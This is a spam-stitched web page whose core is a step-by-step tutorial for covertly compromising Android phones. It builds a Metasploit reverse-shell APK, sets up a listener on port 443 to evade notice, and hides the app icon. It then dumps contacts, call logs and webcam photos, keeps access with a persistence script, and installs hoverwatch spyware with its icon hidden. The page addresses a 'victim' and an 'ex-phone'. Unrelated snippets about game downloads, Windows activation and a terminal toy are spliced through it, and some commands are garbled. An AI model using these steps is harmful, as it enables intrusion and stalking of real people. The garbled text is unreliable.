Download Hacking Terminal For Phone
- Download Hacking Terminal For Phone Android
- Download Hacking Terminal For Phones
- Download Hacking Terminal For Phone Number
- Download Hacking Terminal For Phone Number
- Sep 25, 2019 Download Hacking Books In PDF and learn the updated hacking tutorials 2019. There are many ways to Learn Ethical Hacking like you can learn from online websites, learn from online classes, learn from offline coaching, learn from best hacking books for beginners. So here is the list of all best hacking books free download in PDF format.
- Disclaimer: there is nothing like hacking in this video, I used basic commands. In this video I tried to show you how we can use Linux terminal on Android. The main thing is that you can change.
- 15+ Best Android Hacking Apps And Tools. Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap was initially developed for Unix OS but now it is available on Windows and Android as well. Nmap for Android is a Nmap app for your phone! Once your scan finishes, you can e-mail the results.
In Hollywood movies, hacking always seems interesting, especially because the whole action is spiced up with fancy desktop environments/backgrounds, rapidly uncontrolled typing (with loud typing noise/keystrokes) and rapid scrolling of command output on colorful terminals.
How to Activate Windows 10 without Crack Via Batch Please Like, Share and Comment your valuable thoughts 🙂 Thanks for patronizing Ultimate Tech. This post is about, 'How to Activate Windows 10 without Crack? New Hack' and last updated on December 14, 2018 at 7:32 am. I am sure your visit to us must be quite satisfying and in line with.
Read Also: 20 Useful Terminal Emulators for Linux
To make it all seem real, the hackers normally keep on explaining real-world hacking concepts (and mentioning used tools/commands) while breaking into computer systems or networks and the action gets done in a matter of seconds or minutes, which is far different from the practical real-world scenario.
However, if you want to get a feel of hacking in the movies, easily on your Linux console, then you need to install the Hollywood terminal emulator: developed by Canonical’s Dustin Kirkland.
Watch how Hollywood Terminal works:
This terminal emulator produces Hollywood melodrama technobabble in your byobu console. In this article, we will show you how to setup the byubo console and Hollywood movies hackers’ terminal emulator in Ubuntu and it’s derivatives such as Linux Mint, Kubuntu etc.
First, add the appropriate repository to your system software sources, then update the packages’ sources list and finally install the packages as follows:
To launch Hollywood terminal type:
To stop it, simply press [Ctrl+C] to kill the hollywood script itself, then type exit to quit the byobu console.
To set the number of splits to divide your screen, use the -s
You can turn off the theme song, using -q
flag like this.
You might also like to read these following related articles on Linux Terminal.
That’s all. Hope you find this interesting but remember real life hacking is complicated, you need to take time to learn, understand and penetrate operating systems or applications and beyond.
If you know of any similar fancy command line utilities out there, do share with us including any other thoughts about this article, via the feedback form below.
Do you want to learn android pen testing or just want to hack your ex-phone? I will explain everything from scratch. You did not need any previous knowledge for this.
Just read this post carefully with patience.
After reading this post, you can hack any android phone (but don’t expect any magic from me).
I will post 2-3 on Android hacking
You will learn
- How to hack android using Linux os
- Hack using any device.
- Hack by window operating system
If you are a beginner then read these article before reading this article. Otherwise, you will not properly understand this article.
Stupid Question like ‘How to hack an android phone,’ ‘what is this,’ ‘My gf/bf cheating me please help me’ is not allowed
Using the Linux operating system.
I am assuming you have read kali Linux tutorials for beginners. In Kali Linux, there is tool known as Metasploit
What is Metasploit
Metasploit is the framework where all type of pen testing tool is present. You can hack anything like window pc, server, android, etc. If you are beginner check out the Metasploit tutorial for beginners.
Practical 😀
Note: I’m using same wifi network. In the end, I will show you How to hack the device that is not on your network?. Keep reading.
First of all, we create a payload (you can call it app) then install it on his/her phone. When your victim opens it you his device will be in your control.
Here is the command to run in the terminal
msfvenom -p android/meterpreter/reverse_tcp LPORT=your local IP LPORT=4444 -o appname.apk
This command will create an app in the current directory with the name of appname. Off course you can change it to anything. Let me explain this
-p for payload. I have reverse_tcp because it bypasses all kind of firewall rules.
LHOST: Is your local IP address. Type ifconfig to find your IP address. Make sure your target mobile phone is using the same network. Later on, I will tell you how to hack android phones that are outside of your network.
LPORT: for selecting the port number. I have chosen 4444 because it is free. You can choose anyone but in the particular case, I will recommend you to chose 443. It is the port number for https. So in any case expert it scanning phone he/she will ignore this because it is the port for https (it should open). If he/she see port 4444 is open, then he can check the phone.
o For saving app, you can use > too. It will keep apk in the current directory.
After that in terminal type msfconsole. It will launch Metasploit.
Set your exploit to multi handler. here is the command
use exploit/multi/handler
(if you are confused by this command to read Metasploit tutorial for a beginner )
Now we need to set the payload
set payload android/meterpreter/reverse_tcp
Show options command will show all the options. As you can see in the screenshot, we need to set LHOST (mean local IP address)
This is my IP your IP different than this. I show you above how to find the local Ip address

Port number should be same as msfvenom. Mine is 443
set LPORT 443
Last command
Your system is ready for hacking the android phone.
App that you created in the first step install it in your phone (for testing)
open it (you will get nothing)
But on the computer side, you got the meterpreter session. Mean you have hacked this device :).
In my case, I don’t know why I am facing this error
Don’t worry run this command
session -i
Psp files for android download. Aug 19, 2019 Pro Evolution Soccer 2020 PPSSPP Iso File Download For Playstation Portable (PSP) and the Emulator for Android device is finally out! The First working Free download Link for PES 2020 Iso File for PPSSPP which comes with PS4 Camera, it saves data, latest transfers, new colorful score display, updated balls, Hd pitches, Stadiums, Kits, and Logos. This Game has.
It will show output similar to like it. Because I open the app three times so I got 3 sessions.
In my case I got 3 sessions I don’t not in your case but we will select the last sessions. Command
sessions -i 3

You got meterpreter sessions 😎
type help to see what can you do.
You can do anything like taking screenshots, call details, keylogger, upload and download files, etc.
These are a lot commands here are some samples
- To take photo
- webcam_snap
- To export all contacts
- dump_contacts
- For call logs
- dump_calllog
- You can hide app too
- hide_app_icon
You can download or upload files too if you know Linux commands
Moral: you can do anything.
How to send to apk file to Victim
If you send file this. He/She will definitely uninstall it because it shows nothing. You hide the app icon using hide_app_icon command.
App open again and again automatically
But if user clean recent apps then our connection will be lhost.
To bypass this problem follow these steps.
Open any text editor and copy paste these codes.
save it with
Make sure extension is .sh
When you got meterpreter session then run these commands
cd /sdcard/Download
You will like this on uploading script
This means you have uploaded script successfully. Run these commands to execute script.
cd /sdcard/Download
Once the editing is finished, you can share your video with the app's own network or publish it on different social media platforms.What you should note is that you have to upload your clips to the company’s server before you can start editing, and then you have to redownload the edited video after you finished.Price: Free with adsSystem Requirement: Android 3.0 or higher. It provides nicely designed themes that attach specific songs and visual styles to your project. /download-sound-editing-software-for-android.html. AndroVid is a very handy video editor with many features, which allows you to cut, trim, edit and add music at any instant. You can also choose to use your own musics if you prefer.
after 5-10 seconds press ctrl+c like the screenshot
Don’t worry we stop shell not script.
As you can see in the screenshot I got New meterpreter sessions after every 20 seconds.
Download Hacking Terminal For Phone Android
Until you will not reboot your phone you will continuously get meterpreter sessions after every 20 seconds.
How to hack the device that is not in your network?
You can port forward your router then use your public IP address (search on google my public IP). In the case, if you are using mobile data then buy a web server.
How to get web server free?
Google cloud provide you free web server with the amount of $300. You can use this money to install Linux distribution (I think Debian coast $10/month). Install Kali Linux and do the same process just change IP to your public IP (Google will provide you).
Download Hacking Terminal For Phones
Make sure you have the credit card for making billing.
Hack Using any device
For this, we will use a unique app known as keylogger apps. It will record everything typed by victim keyboard and send to you. There are many keylogger apps available for Android, But I will use hoverwatch.
This app is not available in Google play store. You have to download from official site. This is best free spy software from all tested apps.
Just Install and receive log files online. There is the only one limitation in this app that it will give you free trial version up to 3 days. Therefore, you can use hoverwatch free for only three days. Paid Plans are starting from $8.33/month for a single device.
There is the only one limitation in this app that it will give you free trial version up to 3 days only mean you can use this app free for just three days. Plans are starting from $8.33/month for a single device.
How to enable hoverwatch
- Open hoverwatch official site, type your email and password and click on “Sign up Free” Button.
- It will take you to URLyou can see a Download button click on it [make sure it is under android tab as shown in the screenshot]
- After downloading Install it in which phone you want to install. Don’t ask in comments how to install an app.
- After Installing it, open the app. When you open this app, it will ask you about I am going to use this software to monitor. I recommend you to choosing my device and make sure Hide Hoverwatch Icon and click on the Ok button
- on next page agree With Legal Terms tap on I ACCEPT button then It will ask for “Activate device administrator” click on Activate button
- On next page, it will ask your email & password so enter email and password that you made in the first step
- Done now you are ready you can view logs on hoverwatch website. Sign in your account and you can see all recorded keystroke.
Download Hacking Terminal For Phone Number
By window 10 operating system
You can install Metasploit in the window Os too. Click here to Install all tools including Metasploit. This is the best easy way to hack the android phone.
Download Hacking Terminal For Phone Number
I have published send part of android Hacking. Install apps without touching phone.